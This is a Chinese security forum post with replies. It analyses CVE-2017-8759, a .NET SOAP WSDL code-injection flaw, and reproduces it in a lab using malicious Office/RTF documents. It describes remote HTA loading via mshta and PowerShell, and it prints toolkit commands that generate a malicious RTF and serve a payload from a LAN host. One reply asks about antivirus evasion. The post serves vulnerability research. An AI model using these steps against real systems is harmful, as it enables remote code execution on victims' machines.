首页
社区
课程
招聘
[原创]CVE-2017-8759漏洞远程渗透利用分析
发表于: 2017-9-24 00:05 9932

[原创]CVE-2017-8759漏洞远程渗透利用分析

2017-9-24 00:05
9932

      CVE-2017-8759漏洞是由一个换行符引发的0day漏洞,该漏洞影响所有主流的.NET Framework版本。在.net库中的SOAP WSDL解析模块IsValidUrl函数没有正确处理包含回车换行符的情况,导致调用者函数PrintClientProxy存在代码注入执行漏洞,该漏洞被用于Office文档高级威胁攻击。笔者在分析了漏洞样本文件,在局域网环境下实现了远程渗透,并进行了调试分析。 

      声明,该漏洞分析及利用过程仅作学习研究之用,由此产生的直接和间接后果作者概不负责。

     0x01分析环境

     0x02样本分析

         0x021样本1分析

          样本1由三个部分组成,Doc1.doc、cmd.hta、exploit.txt,使用winhex打开Doc1.doc,如图 1


         可以看到,Doc1.doc中包含引用指定url上文件的soap wsdl路径,引用的文件正好是exploit.txt,打开该文件,如图2


        可以看到,该文件中是xml格式,有2个soap:address location,且第二个soap:address location后面是回车换行,然后是要注入的代码,存在漏洞的SOAP WSDL解析模块IsValidUrl函数对soap:address location处理失误,导致后面的注入代码执行。该代码使用System.Diagnostics.Process.Start方法调用mshta.exe加载指定url上的hta脚本。        

        使用notepad.exe打开cmd.hta,如图3

 

         该hta文件使用VBScrip脚本语言,利用powershell执行mspaint.exe。

         可以总结样本1的执行流程,如图4:

             将exploit.txt和cmd.hta放到IIS服务器根目录wwwroot下,在本地计算机打开Doc1.doc,如图5


            注入代码得到执行,弹出了画图工具界面。

            为了从二进制角度观察注入代码执行情况,用OllyDbg附加到word进程。由于我使用的word 2013,在OllyDbg的附加进程窗口找不到WINWORD.EXE,尝试用OllyDbg直接打开安装目录下的WINWORD.EXE,同样失败。但是在任务管理器中可以看到WINWORD.EXE,至于为什么不能调试,一时找不到原因,可能是使用了反调试技术。

          修改Doc1.doc中的url为宿主机ip,在虚拟机上打开Doc1.doc,注入代码并没有得到执行。

       0x022样本2分析

            样本2使用github项目上的cve-2017-8759_toolkit.py生成。该工具包的语法如下:

          1.生成恶意rtf文档

            python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.2.3/exploit.txt

            -M表示模式,生成恶意rtf或进行exploit,gen表示生成恶意rtf,-w 后面是rtf文档的名称,-u后面是远程文档的路径(相对于目标机器),是一个url,其中exploit.txt与样本1中的exploit.txt内容一样,是一个soap xml文件,即恶意rtf在目标机器上打开时链接的文件            

           在命令提示符下运行上述命令,如图6

     

            可以看到,rtf文件在Administrator文档下已经生成。

          2. exploit

           python cve-2017-8759_toolkit.py -M exp -e http://192.168.2.3/cmd.hta -l /tmp/cmd.hta

          -M表示模式,exp表示进行exploit,-e后面是在目标机器上要执行的可执行文件或载荷的路径,是一个url,其中cmd.hta与样本1中的一样,-l指定可执行文件或载荷的本地路径(服务器)。

          在命令提示符下运行上述命令,如图7


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

上传的附件:
收藏
免费 0
支持
分享
最新回复 (8)
雪    币: 274
活跃值: (87)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
沙发
2017-9-24 09:10
0
雪    币: 26971
活跃值: (63142)
能力值: (RANK:135 )
在线值:
发帖
回帖
粉丝
3
精彩
2017-9-24 17:37
0
雪    币: 220
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
漏洞复现,一般都能出来,这样的分析有点简单,而且与网上的大同小异。

就敢问下,能不能过卡巴斯基。能不能免杀,有没有自己的比较独到的观点
2017-9-24 22:49
0
雪    币: 6818
活跃值: (153)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
不错!!!!!!
2017-9-25 20:27
0
雪    币: 22
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
6
这是web漏洞吗  晕
2017-10-1 07:42
0
雪    币: 176
活跃值: (257)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
这个,youtube视频有,msf中也可以操作利用!
2017-10-1 19:19
0
雪    币: 1200
活跃值: (1123)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
8



shijiheima

这个,youtube视频有,msf中也可以操作利用!

别人的终归是别人的,自己从头到尾分析调试一下也不错。
2017-10-3 20:47
0
雪    币: 1200
活跃值: (1123)
能力值: ( LV10,RANK:170 )
在线值:
发帖
回帖
粉丝
9
kanxueadmin 这是web漏洞吗 晕
可以从web服务器上发起攻击,虽然根源是客户端.net  soap  wsdl解析库的问题,个人觉得应该归类于广义的web安全,个人浅见
2017-10-3 20:51
0
游客
登录 | 注册 方可回帖
返回
//